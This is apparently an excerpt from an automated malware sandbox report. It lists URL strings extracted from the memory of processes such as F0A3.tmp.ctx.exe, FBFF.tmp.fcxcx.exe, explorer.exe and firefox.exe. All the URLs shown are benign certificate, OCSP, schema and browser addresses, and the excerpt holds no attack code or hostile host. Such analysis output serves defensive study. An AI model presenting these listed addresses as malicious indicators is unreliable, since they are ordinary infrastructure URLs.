                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.0000000009519000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: firefox.exe, 0000002C.00000002.2686204496.00000144AEECE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                      Source: firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.htmlshouldSkipCheckForuserenURLOrZeroSizedworkerAssociated
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: firefox.exe, 0000002C.00000003.2542860248.00000144AD0FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000003.2542860248.00000144AD0DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2697661848.00000144AF351000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2814264017.00000144B4E29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2648726496.00000144AD2CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2635101349.00000144ACA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2803265477.00000144B08F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2658271522.00000144AD5D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2686204496.00000144AEE4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2634244627.00000144AC94C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2639057942.00000144ACC3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2709016871.00000144AF8D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2709016871.00000144AF808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                      Source: explorer.exe, 00000014.00000000.2216466843.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                      Source: explorer.exe, 00000014.00000000.2204496366.000000000305D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                      Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://www.inbox.l
                      Source: F0A3.tmp.ctx.exe, 00000027.00000002.2482728285.00007FF8209FD000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
                      Source: explorer.exe, 00000014.00000000.2203972255.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214469056.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214505434.0000000007B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
